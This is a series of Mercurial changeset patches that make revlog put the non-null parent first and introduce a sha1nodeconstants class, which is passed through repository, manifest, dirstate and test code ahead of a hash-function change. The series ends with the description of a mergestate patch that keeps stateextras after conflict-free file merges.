49fd21f32695d885d730b56d91707c9059c6bd54 # Parent 066b8d8f75b873ecd1b8a1c4633c4a121c95d57d revlog: guarantee that p1 != null if a non-null parent exists This change does not affect the hashing (which already did this transformation), but can change the log output in the rare case where this behavior was observed in repositories. The change can simplify iteration code where regular changesets and merges are distinct branches. 
Differential Revision: https://phab.mercurial-scm.org/D10150 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -908,8 +908,10 @@ if rev == wdirrev: raise error.WdirUnsupported raise - - return entry[5], entry[6] + if entry[5] == nullrev: + return entry[6], entry[5] + else: + return entry[5], entry[6] # fast parentrevs(rev) where rev isn't filtered _uncheckedparentrevs = parentrevs @@ -930,7 +932,11 @@ def parents(self, node): i = self.index d = i[self.rev(node)] - return i[d[5]][7], i[d[6]][7] # map revisions to nodes inline + # inline node() to avoid function call overhead + if d[5] == nullid: + return i[d[6]][7], i[d[5]][7] + else: + return i[d[5]][7], i[d[6]][7] def chainlen(self, rev): return self._chaininfo(rev)[0] diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -26,6 +26,13 @@ == Backwards Compatibility Changes == + * In normal repositories, the first parent of a changeset is not null, + unless both parents are null (like the first changeset). Some legacy + repositories violate this condition. The revlog code will now + silentely swap the parents if this condition is tested. This can + change the output of `hg log` when explicitly asking for first or + second parent. 
+ == Internal API Changes == diff --git a/tests/test-narrow-shallow-merges.t b/tests/test-narrow-shallow-merges.t --- a/tests/test-narrow-shallow-merges.t +++ b/tests/test-narrow-shallow-merges.t @@ -179,7 +179,7 @@ $ hg log -T '{if(ellipsis,"...")}{node|short} {p1node|short} {p2node|short} {desc}\n' | sort - ...2a20009de83e 000000000000 3ac1f5779de3 outside 10 + ...2a20009de83e 3ac1f5779de3 000000000000 outside 10 ...3ac1f5779de3 bb96a08b062a 465567bdfb2d merge a/b/c/d 9 ...8d874d57adea 7ef88b4dd4fa 000000000000 outside 12 ...b844052e7b3b 000000000000 000000000000 outside 2c # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1610550898 -3600 # Wed Jan 13 16:14:58 2021 +0100 # Node ID 6266d19556ad186f81caf3e892148a993428c407 # Parent 49fd21f32695d885d730b56d91707c9059c6bd54 node: introduce nodeconstants class In preparing for moving from SHA1 hashes to a modern hash function, place nullid and other constant magic vules in a class. Provide the active set of constants in the repository and push it down. Provide nullid directly in strategic places like the repository as it is accessed very often. This changeset introduces the API change, but not the mechanical replacement of the node.py attributes itself. 
Differential Revision: https://phab.mercurial-scm.org/D9750 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -3672,7 +3672,7 @@ Result is the number of markers in the repo.""" timer, fm = gettimer(ui) svfs = getsvfs(repo) - timer(lambda: len(obsolete.obsstore(svfs))) + timer(lambda: len(obsolete.obsstore(repo, svfs))) fm.end() diff --git a/hgext/absorb.py b/hgext/absorb.py --- a/hgext/absorb.py +++ b/hgext/absorb.py @@ -102,6 +102,9 @@ class emptyfilecontext(object): """minimal filecontext representing an empty file""" + def __init__(self, repo): + self._repo = repo + def data(self): return b'' @@ -212,7 +215,7 @@ if path in pctx: fctxs.append(pctx[path]) else: - fctxs.append(emptyfilecontext()) + fctxs.append(emptyfilecontext(pctx.repo())) fctxs.reverse() # note: we rely on a property of hg: filerev is not reused for linear diff --git a/hgext/git/gitlog.py b/hgext/git/gitlog.py --- a/hgext/git/gitlog.py +++ b/hgext/git/gitlog.py @@ -8,6 +8,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, wdirhex, ) from mercurial import ( @@ -422,6 +423,8 @@ class manifestlog(baselog): + nodeconstants = sha1nodeconstants + def __getitem__(self, node): return self.get(b'', node) diff --git a/hgext/largefiles/lfutil.py b/hgext/largefiles/lfutil.py --- a/hgext/largefiles/lfutil.py +++ b/hgext/largefiles/lfutil.py @@ -206,6 +206,7 @@ repo.root, repo.dirstate._validate, lambda: sparse.matcher(repo), + repo.nodeconstants, ) # If the largefiles dirstate does not exist, populate and create diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -54,6 +54,7 @@ from mercurial.node import ( nullid, nullrev, + sha1nodeconstants, short, ) from mercurial.thirdparty import attr @@ -305,6 +306,7 @@ """Implements storage for an individual tracked path.""" def __init__(self, db, path, compression): + self.nullid = sha1nodeconstants.nullid self._db = db self._path = path diff --git 
a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -623,7 +623,7 @@ _binaryentry = struct.Struct(b'>20sH') -def binaryencode(bookmarks): +def binaryencode(repo, bookmarks): """encode a '(bookmark, node)' iterable into a binary stream the binary format is: @@ -645,7 +645,7 @@ return b''.join(binarydata) -def binarydecode(stream): +def binarydecode(repo, stream): """decode a binary stream into an '(bookmark, node)' iterable the binary format is: diff --git a/mercurial/branchmap.py b/mercurial/branchmap.py --- a/mercurial/branchmap.py +++ b/mercurial/branchmap.py @@ -97,7 +97,7 @@ revs.extend(r for r in extrarevs if r <= bcache.tiprev) else: # nothing to fall back on, start empty. - bcache = branchcache() + bcache = branchcache(repo) revs.extend(cl.revs(start=bcache.tiprev + 1)) if revs: @@ -129,6 +129,7 @@ if rbheads: rtiprev = max((int(clrev(node)) for node in rbheads)) cache = branchcache( + repo, remotebranchmap, repo[rtiprev].node(), rtiprev, @@ -184,6 +185,7 @@ def __init__( self, + repo, entries=(), tipnode=nullid, tiprev=nullrev, @@ -195,6 +197,7 @@ """hasnode is a function which can be used to verify whether changelog has a given node or not. If it's not provided, we assume that every node we have exists in changelog""" + self._repo = repo self.tipnode = tipnode self.tiprev = tiprev self.filteredhash = filteredhash @@ -280,6 +283,7 @@ if len(cachekey) > 2: filteredhash = bin(cachekey[2]) bcache = cls( + repo, tipnode=last, tiprev=lrev, filteredhash=filteredhash, @@ -388,6 +392,7 @@ def copy(self): """return an deep copy of the branchcache object""" return type(self)( + self._repo, self._entries, self.tipnode, self.tiprev, diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -2146,7 +2146,7 @@ contains binary encoded (bookmark, node) tuple. 
If the local state does not marks the one in the part, a PushRaced exception is raised """ - bookdata = bookmarks.binarydecode(inpart) + bookdata = bookmarks.binarydecode(op.repo, inpart) msgstandard = ( b'remote repository changed while pushing - please try again ' @@ -2376,7 +2376,7 @@ When mode is 'records', the information is recorded into the 'bookmarks' records of the bundle operation. This behavior is suitable for pulling. """ - changes = bookmarks.binarydecode(inpart) + changes = bookmarks.binarydecode(op.repo, inpart) pushkeycompat = op.repo.ui.configbool( b'server', b'bookmarks-pushkey-compat' diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -175,9 +175,15 @@ class bundlemanifest(bundlerevlog, manifest.manifestrevlog): def __init__( - self, opener, cgunpacker, linkmapper, dirlogstarts=None, dir=b'' + self, + nodeconstants, + opener, + cgunpacker, + linkmapper, + dirlogstarts=None, + dir=b'', ): - manifest.manifestrevlog.__init__(self, opener, tree=dir) + manifest.manifestrevlog.__init__(self, nodeconstants, opener, tree=dir) bundlerevlog.__init__( self, opener, self.indexfile, cgunpacker, linkmapper ) @@ -192,6 +198,7 @@ if d in self._dirlogstarts: self.bundle.seek(self._dirlogstarts[d]) return bundlemanifest( + self.nodeconstants, self.opener, self.bundle, self._linkmapper, @@ -368,7 +375,9 @@ # consume the header if it exists self._cgunpacker.manifestheader() linkmapper = self.unfiltered().changelog.rev - rootstore = bundlemanifest(self.svfs, self._cgunpacker, linkmapper) + rootstore = bundlemanifest( + self.nodeconstants, self.svfs, self._cgunpacker, linkmapper + ) self.filestart = self._cgunpacker.tell() return manifest.manifestlog( diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -662,7 +662,7 @@ return readexactly(self._fh, n) -def _revisiondeltatochunks(delta, headerfn): +def 
_revisiondeltatochunks(repo, delta, headerfn): """Serialize a revisiondelta to changegroup chunks.""" # The captured revision delta may be encoded as a delta against @@ -1065,7 +1065,9 @@ sidedata_helpers=sidedata_helpers, ) for delta in deltas: - for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): + for chunk in _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ): size += len(chunk) yield chunk @@ -1121,7 +1123,9 @@ yield chunk for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk @@ -1160,7 +1164,9 @@ yield h for delta in deltas: - chunks = _revisiondeltatochunks(delta, self._builddeltaheader) + chunks = _revisiondeltatochunks( + self._repo, delta, self._builddeltaheader + ) for chunk in chunks: size += len(chunk) yield chunk diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -191,7 +191,7 @@ # Extensions might modify _defaultextra, so let the constructor below pass # it in extra = attr.ib() - manifest = attr.ib(default=nullid) + manifest = attr.ib() user = attr.ib(default=b'') date = attr.ib(default=(0, 0)) files = attr.ib(default=attr.Factory(list)) @@ -219,9 +219,9 @@ '_changes', ) - def __new__(cls, text, sidedata, cpsd): + def __new__(cls, cl, text, sidedata, cpsd): if not text: - return _changelogrevision(extra=_defaultextra) + return _changelogrevision(extra=_defaultextra, manifest=nullid) self = super(changelogrevision, cls).__new__(cls) # We could return here and implement the following as an __init__. 
@@ -526,7 +526,7 @@ """ d, s = self._revisiondata(nodeorrev) c = changelogrevision( - d, s, self._copiesstorage == b'changeset-sidedata' + self, d, s, self._copiesstorage == b'changeset-sidedata' ) return (c.manifest, c.user, c.date, c.files, c.description, c.extra) @@ -534,7 +534,7 @@ """Obtain a ``changelogrevision`` for a node or revision.""" text, sidedata = self._revisiondata(nodeorrev) return changelogrevision( - text, sidedata, self._copiesstorage == b'changeset-sidedata' + self, text, sidedata, self._copiesstorage == b'changeset-sidedata' ) def readfiles(self, nodeorrev): diff --git a/mercurial/dirstate.py b/mercurial/dirstate.py --- a/mercurial/dirstate.py +++ b/mercurial/dirstate.py @@ -73,13 +73,16 @@ @interfaceutil.implementer(intdirstate.idirstate) class dirstate(object): - def __init__(self, opener, ui, root, validate, sparsematchfn): + def __init__( + self, opener, ui, root, validate, sparsematchfn, nodeconstants + ): """Create a new dirstate object. opener is an open()-like callable that can be used to open the dirstate file; root is the root of the directory tracked by the dirstate. """ + self._nodeconstants = nodeconstants self._opener = opener self._validate = validate self._root = root @@ -136,7 +139,9 @@ @propertycache def _map(self): """Return the dirstate contents (see documentation for dirstatemap).""" - self._map = self._mapcls(self._ui, self._opener, self._root) + self._map = self._mapcls( + self._ui, self._opener, self._root, self._nodeconstants + ) return self._map @property @@ -1420,12 +1425,13 @@ denormalized form that they appear as in the dirstate. 
""" - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): self._ui = ui self._opener = opener self._root = root self._filename = b'dirstate' self._nodelen = 20 + self._nodeconstants = nodeconstants self._parents = None self._dirtyparents = False @@ -1724,7 +1730,8 @@ if rustmod is not None: class dirstatemap(object): - def __init__(self, ui, opener, root): + def __init__(self, ui, opener, root, nodeconstants): + self._nodeconstants = nodeconstants self._ui = ui self._opener = opener self._root = root diff --git a/mercurial/discovery.py b/mercurial/discovery.py --- a/mercurial/discovery.py +++ b/mercurial/discovery.py @@ -270,9 +270,12 @@ # C. Update newmap with outgoing changes. # This will possibly add new heads and remove existing ones. newmap = branchmap.remotebranchcache( - (branch, heads[1]) - for branch, heads in pycompat.iteritems(headssum) - if heads[0] is not None + repo, + ( + (branch, heads[1]) + for branch, heads in pycompat.iteritems(headssum) + if heads[0] is not None + ), ) newmap.update(repo, (ctx.rev() for ctx in missingctx)) for branch, newheads in pycompat.iteritems(newmap): diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -827,7 +827,7 @@ data = [] for book, old, new in pushop.outbookmarks: data.append((book, old)) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'check:bookmarks', data=checkdata) @@ -1027,7 +1027,7 @@ _abortonsecretctx(pushop, new, book) data.append((book, new)) allactions.append((book, _bmaction(old, new))) - checkdata = bookmod.binaryencode(data) + checkdata = bookmod.binaryencode(pushop.repo, data) bundler.newpart(b'bookmarks', data=checkdata) def handlereply(op): @@ -2455,7 +2455,7 @@ if not b2caps or b'bookmarks' not in b2caps: raise error.Abort(_(b'no common bookmarks exchange method')) books = bookmod.listbinbookmarks(repo) - data = 
bookmod.binaryencode(books) + data = bookmod.binaryencode(repo, books) if data: bundler.newpart(b'bookmarks', data=data) diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -33,6 +33,7 @@ # Used by LFS. self._revlog.filename = path self._revlog.revlog_kind = b'filelog' + self.nullid = self._revlog.nullid def __len__(self): return len(self._revlog) diff --git a/mercurial/interfaces/dirstate.py b/mercurial/interfaces/dirstate.py --- a/mercurial/interfaces/dirstate.py +++ b/mercurial/interfaces/dirstate.py @@ -8,7 +8,7 @@ class idirstate(interfaceutil.Interface): - def __init__(opener, ui, root, validate, sparsematchfn): + def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants): """Create a new dirstate object. opener is an open()-like callable that can be used to open the diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -523,6 +523,10 @@ * Metadata to facilitate storage. """ + nullid = interfaceutil.Attribute( + """node for the null revision for use as delta base.""" + ) + def __len__(): """Obtain the number of revisions stored for this file.""" @@ -1143,6 +1147,10 @@ class imanifeststorage(interfaceutil.Interface): """Storage interface for manifest data.""" + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + tree = interfaceutil.Attribute( """The path to the directory this manifest tracks. @@ -1366,6 +1374,10 @@ tree manifests. """ + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + def __getitem__(node): """Obtain a manifest instance for a given binary node. @@ -1434,6 +1446,13 @@ This currently captures the reality of things - not how things should be. 
""" + nodeconstants = interfaceutil.Attribute( + """Constant nodes matching the hash function used by the repository.""" + ) + nullid = interfaceutil.Attribute( + """null revision for the hash function used by the repository.""" + ) + supportedformats = interfaceutil.Attribute( """Set of requirements that apply to stream clone. diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -21,6 +21,7 @@ hex, nullid, nullrev, + sha1nodeconstants, short, ) from .pycompat import ( @@ -1330,6 +1331,8 @@ self.vfs = hgvfs self.path = hgvfs.base self.requirements = requirements + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid self.supported = supportedrequirements self.sharedpath = sharedpath self.store = store @@ -1676,7 +1679,12 @@ sparsematchfn = lambda: sparse.matcher(self) return dirstate.dirstate( - self.vfs, self.ui, self.root, self._dirstatevalidate, sparsematchfn + self.vfs, + self.ui, + self.root, + self._dirstatevalidate, + sparsematchfn, + self.nodeconstants, ) def _dirstatevalidate(self, node): diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -792,8 +792,9 @@ @interfaceutil.implementer(repository.imanifestdict) class treemanifest(object): - def __init__(self, dir=b'', text=b''): + def __init__(self, nodeconstants, dir=b'', text=b''): self._dir = dir + self.nodeconstants = nodeconstants self._node = nullid self._loadfunc = _noop self._copyfunc = _noop @@ -1051,7 +1052,9 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].__setitem__(subpath, n) else: # manifest nodes are either 20 bytes or 32 bytes, @@ -1078,14 +1081,16 @@ if dir: self._loadlazy(dir) if dir not in self._dirs: - self._dirs[dir] = treemanifest(self._subpath(dir)) + self._dirs[dir] = 
treemanifest( + self.nodeconstants, self._subpath(dir) + ) self._dirs[dir].setflag(subpath, flags) else: self._flags[f] = flags self._dirty = True def copy(self): - copy = treemanifest(self._dir) + copy = treemanifest(self.nodeconstants, self._dir) copy._node = self._node copy._dirty = self._dirty if self._copyfunc is _noop: @@ -1215,7 +1220,7 @@ visit = match.visitchildrenset(self._dir[:-1]) if visit == b'all': return self.copy() - ret = treemanifest(self._dir) + ret = treemanifest(self.nodeconstants, self._dir) if not visit: return ret @@ -1272,7 +1277,7 @@ m2 = m2._matches(match) return m1.diff(m2, clean=clean) result = {} - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def _iterativediff(t1, t2, stack): """compares two tree manifests and append new tree-manifests which @@ -1368,7 +1373,7 @@ self._load() # for consistency; should never have any effect here m1._load() m2._load() - emptytree = treemanifest() + emptytree = treemanifest(self.nodeconstants) def getnode(m, d): ld = m._lazydirs.get(d) @@ -1551,6 +1556,7 @@ def __init__( self, + nodeconstants, opener, tree=b'', dirlogcache=None, @@ -1567,6 +1573,7 @@ option takes precedence, so if it is set to True, we ignore whatever value is passed in to the constructor. """ + self.nodeconstants = nodeconstants # During normal operations, we expect to deal with not more than four # revs at a time (such as during commit --amend). When rebasing large # stacks of commits, the number can go up, hence the config knob below. @@ -1654,7 +1661,11 @@ assert self._treeondisk if d not in self._dirlogcache: mfrevlog = manifestrevlog( - self.opener, d, self._dirlogcache, treemanifest=self._treeondisk + self.nodeconstants, + self.opener, + d, + self._dirlogcache, + treemanifest=self._treeondisk, ) self._dirlogcache[d] = mfrevlog return self._dirlogcache[d] @@ -1917,6 +1928,7 @@ they receive (i.e. 
tree or flat or lazily loaded, etc).""" def __init__(self, opener, repo, rootstore, narrowmatch): + self.nodeconstants = repo.nodeconstants usetreemanifest = False cachesize = 4 @@ -1955,7 +1967,7 @@ if not self._narrowmatch.always(): if not self._narrowmatch.visitdir(tree[:-1]): - return excludeddirmanifestctx(tree, node) + return excludeddirmanifestctx(self.nodeconstants, tree, node) if tree: if self._rootstore._treeondisk: if verify: @@ -2118,7 +2130,7 @@ def __init__(self, manifestlog, dir=b''): self._manifestlog = manifestlog self._dir = dir - self._treemanifest = treemanifest() + self._treemanifest = treemanifest(manifestlog.nodeconstants) def _storage(self): return self._manifestlog.getstorage(b'') @@ -2168,17 +2180,19 @@ narrowmatch = self._manifestlog._narrowmatch if not narrowmatch.always(): if not narrowmatch.visitdir(self._dir[:-1]): - return excludedmanifestrevlog(self._dir) + return excludedmanifestrevlog( + self._manifestlog.nodeconstants, self._dir + ) return self._manifestlog.getstorage(self._dir) def read(self): if self._data is None: store = self._storage() if self._node == nullid: - self._data = treemanifest() + self._data = treemanifest(self._manifestlog.nodeconstants) # TODO accessing non-public API elif store._treeondisk: - m = treemanifest(dir=self._dir) + m = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) def gettext(): return store.revision(self._node) @@ -2198,7 +2212,9 @@ text = store.revision(self._node) arraytext = bytearray(text) store.fulltextcache[self._node] = arraytext - self._data = treemanifest(dir=self._dir, text=text) + self._data = treemanifest( + self._manifestlog.nodeconstants, dir=self._dir, text=text + ) return self._data @@ -2235,7 +2251,7 @@ r0 = store.deltaparent(store.rev(self._node)) m0 = self._manifestlog.get(self._dir, store.node(r0)).read() m1 = self.read() - md = treemanifest(dir=self._dir) + md = treemanifest(self._manifestlog.nodeconstants, dir=self._dir) for f, ((n0, fl0), (n1, fl1)) in 
pycompat.iteritems(m0.diff(m1)): if n1: md[f] = n1 @@ -2278,8 +2294,8 @@ whose contents are unknown. """ - def __init__(self, dir, node): - super(excludeddir, self).__init__(dir) + def __init__(self, nodeconstants, dir, node): + super(excludeddir, self).__init__(nodeconstants, dir) self._node = node # Add an empty file, which will be included by iterators and such, # appearing as the directory itself (i.e. something like "dir/") @@ -2298,12 +2314,13 @@ class excludeddirmanifestctx(treemanifestctx): """context wrapper for excludeddir - see that docstring for rationale""" - def __init__(self, dir, node): + def __init__(self, nodeconstants, dir, node): + self.nodeconstants = nodeconstants self._dir = dir self._node = node def read(self): - return excludeddir(self._dir, self._node) + return excludeddir(self.nodeconstants, self._dir, self._node) def readfast(self, shallow=False): # special version of readfast since we don't have underlying storage @@ -2325,7 +2342,8 @@ outside the narrowspec. """ - def __init__(self, dir): + def __init__(self, nodeconstants, dir): + self.nodeconstants = nodeconstants self._dir = dir def __len__(self): diff --git a/mercurial/node.py b/mercurial/node.py --- a/mercurial/node.py +++ b/mercurial/node.py @@ -21,29 +21,48 @@ raise TypeError(e) -nullrev = -1 -# In hex, this is '0000000000000000000000000000000000000000' -nullid = b"\0" * 20 -nullhex = hex(nullid) +def short(node): + return hex(node[:6]) + -# Phony node value to stand-in for new files in some uses of -# manifests. -# In hex, this is '2121212121212121212121212121212121212121' -newnodeid = b'!!!!!!!!!!!!!!!!!!!!' 
-# In hex, this is '3030303030303030303030303030306164646564' -addednodeid = b'000000000000000added' -# In hex, this is '3030303030303030303030306d6f646966696564' -modifiednodeid = b'000000000000modified' +nullrev = -1 -wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} - -# pseudo identifiers for working directory -# (they are experimental, so don't add too many dependencies on them) +# pseudo identifier for working directory +# (experimental, so don't add too many dependencies on it) wdirrev = 0x7FFFFFFF -# In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' -wdirid = b"\xff" * 20 -wdirhex = hex(wdirid) -def short(node): - return hex(node[:6]) +class sha1nodeconstants(object): + nodelen = 20 + + # In hex, this is '0000000000000000000000000000000000000000' + nullid = b"\0" * nodelen + nullhex = hex(nullid) + + # Phony node value to stand-in for new files in some uses of + # manifests. + # In hex, this is '2121212121212121212121212121212121212121' + newnodeid = b'!!!!!!!!!!!!!!!!!!!!' 
+ # In hex, this is '3030303030303030303030303030306164646564' + addednodeid = b'000000000000000added' + # In hex, this is '3030303030303030303030306d6f646966696564' + modifiednodeid = b'000000000000modified' + + wdirfilenodeids = {newnodeid, addednodeid, modifiednodeid} + + # pseudo identifier for working directory + # (experimental, so don't add too many dependencies on it) + # In hex, this is 'ffffffffffffffffffffffffffffffffffffffff' + wdirid = b"\xff" * nodelen + wdirhex = hex(wdirid) + + +# legacy starting point for porting modules +nullid = sha1nodeconstants.nullid +nullhex = sha1nodeconstants.nullhex +newnodeid = sha1nodeconstants.newnodeid +addednodeid = sha1nodeconstants.addednodeid +modifiednodeid = sha1nodeconstants.modifiednodeid +wdirfilenodeids = sha1nodeconstants.wdirfilenodeids +wdirid = sha1nodeconstants.wdirid +wdirhex = sha1nodeconstants.wdirhex diff --git a/mercurial/obsolete.py b/mercurial/obsolete.py --- a/mercurial/obsolete.py +++ b/mercurial/obsolete.py @@ -560,10 +560,11 @@ # parents: (tuple of nodeid) or None, parents of predecessors # None is used when no data has been recorded - def __init__(self, svfs, defaultformat=_fm1version, readonly=False): + def __init__(self, repo, svfs, defaultformat=_fm1version, readonly=False): # caches for various obsolescence related cache self.caches = {} self.svfs = svfs + self.repo = repo self._defaultformat = defaultformat self._readonly = readonly @@ -806,7 +807,7 @@ if defaultformat is not None: kwargs['defaultformat'] = defaultformat readonly = not isenabled(repo, createmarkersopt) - store = obsstore(repo.svfs, readonly=readonly, **kwargs) + store = obsstore(repo, repo.svfs, readonly=readonly, **kwargs) if store and readonly: ui.warn( _(b'obsolete feature not enabled but %i markers found!\n') diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -28,6 +28,7 @@ nullhex, nullid, nullrev, + sha1nodeconstants, short, wdirfilenodeids, wdirhex, @@ 
-651,6 +652,10 @@ raise error.RevlogError( _(b'unknown version (%d) in revlog %s') % (fmt, self.indexfile) ) + + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid + # sparse-revlog can't be on without general-delta (issue6056) if not self._generaldelta: self._sparserevlog = False diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -12,6 +12,7 @@ import errno from .i18n import _ +from .node import sha1nodeconstants from . import ( branchmap, changelog, @@ -198,6 +199,8 @@ requirements, supportedrequirements ) localrepo.ensurerequirementscompatible(ui, requirements) + self.nodeconstants = sha1nodeconstants + self.nullid = self.nodeconstants.nullid # setup store self.store = localrepo.makestore(requirements, self.path, vfsclass) @@ -207,7 +210,7 @@ self._filecache = {} self.requirements = requirements - rootmanifest = manifest.manifestrevlog(self.svfs) + rootmanifest = manifest.manifestrevlog(self.nodeconstants, self.svfs) self.manifestlog = manifest.manifestlog( self.svfs, self, rootmanifest, self.narrowmatch() ) diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -441,7 +441,7 @@ ) def manifestlog(self, repo, storenarrowmatch): - rootstore = manifest.manifestrevlog(self.vfs) + rootstore = manifest.manifestrevlog(repo.nodeconstants, self.vfs) return manifest.manifestlog(self.vfs, repo, rootstore, storenarrowmatch) def datafiles(self, matcher=None): diff --git a/mercurial/unionrepo.py b/mercurial/unionrepo.py --- a/mercurial/unionrepo.py +++ b/mercurial/unionrepo.py @@ -153,9 +153,9 @@ class unionmanifest(unionrevlog, manifest.manifestrevlog): - def __init__(self, opener, opener2, linkmapper): - manifest.manifestrevlog.__init__(self, opener) - manifest2 = manifest.manifestrevlog(opener2) + def __init__(self, nodeconstants, opener, opener2, linkmapper): + manifest.manifestrevlog.__init__(self, 
nodeconstants, opener) + manifest2 = manifest.manifestrevlog(nodeconstants, opener2) unionrevlog.__init__( self, opener, self.indexfile, manifest2, linkmapper ) @@ -205,7 +205,10 @@ @localrepo.unfilteredpropertycache def manifestlog(self): rootstore = unionmanifest( - self.svfs, self.repo2.svfs, self.unfiltered()._clrev + self.nodeconstants, + self.svfs, + self.repo2.svfs, + self.unfiltered()._clrev, ) return manifest.manifestlog( self.svfs, self, rootstore, self.narrowmatch() diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -36,7 +36,9 @@ return changelog.changelog(repo.svfs) elif path.endswith(b'00manifest.i'): mandir = path[: -len(b'00manifest.i')] - return manifest.manifestrevlog(repo.svfs, tree=mandir) + return manifest.manifestrevlog( + repo.nodeconstants, repo.svfs, tree=mandir + ) else: # reverse of "/".join(("data", path + ".i")) return filelog.filelog(repo.svfs, path[5:-2]) diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -43,3 +43,7 @@ now get a revision number as argument instead of a node. * revlog.addrevision returns the revision number instead of the node. + + * `nodes.nullid` and related constants are being phased out as part of + the deprecation of SHA1. Repository instances and related classes + provide access via `nodeconstants` and in some cases `nullid` attributes. 
diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -106,7 +106,9 @@ _flagserrorclass = simplestoreerror - def __init__(self, svfs, path): + def __init__(self, repo, svfs, path): + self.nullid = repo.nullid + self._repo = repo self._svfs = svfs self._path = path @@ -689,7 +691,7 @@ class simplestorerepo(repo.__class__): def file(self, f): - return filestorage(self.svfs, f) + return filestorage(repo, self.svfs, f) repo.__class__ = simplestorerepo diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -248,7 +248,10 @@ # Conforms to imanifestlog. ml = manifest.manifestlog( - vfs, repo, manifest.manifestrevlog(repo.svfs), repo.narrowmatch() + vfs, + repo, + manifest.manifestrevlog(repo.nodeconstants, repo.svfs), + repo.narrowmatch(), ) checkzobject(ml) checkzobject(repo.manifestlog) @@ -263,7 +266,7 @@ # Conforms to imanifestdict. 
checkzobject(mctx.read()) - mrl = manifest.manifestrevlog(vfs) + mrl = manifest.manifestrevlog(repo.nodeconstants, vfs) checkzobject(mrl) ziverify.verifyClass(repository.irevisiondelta, revlog.revlogrevisiondelta) diff --git a/tests/test-manifest.py b/tests/test-manifest.py --- a/tests/test-manifest.py +++ b/tests/test-manifest.py @@ -6,6 +6,8 @@ import unittest import zlib +from mercurial.node import sha1nodeconstants + from mercurial import ( manifest as manifestmod, match as matchmod, @@ -436,7 +438,7 @@ class testtreemanifest(unittest.TestCase, basemanifesttests): def parsemanifest(self, text): - return manifestmod.treemanifest(b'', text) + return manifestmod.treemanifest(sha1nodeconstants, b'', text) def testWalkSubtrees(self): m = self.parsemanifest(A_DEEPER_MANIFEST) # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1615361921 -19800 # Wed Mar 10 13:08:41 2021 +0530 # Node ID 1099ca176ba1914297eb49a06832fac853c3dfa0 # Parent 6266d19556ad186f81caf3e892148a993428c407 mergestate: don't pop stateextras when there are no conflicts on filemerge Even if `filemerge.filemerge()` didn't result in conflicts, we should not remove stateextras for a file since we now use that for more things than just merge time information. We use stateextras to store information which is required to be used by commit. I tracked this down while finding why a patch of mine which adds more commit related information does not work as expected and looses the extras in mergestate. 
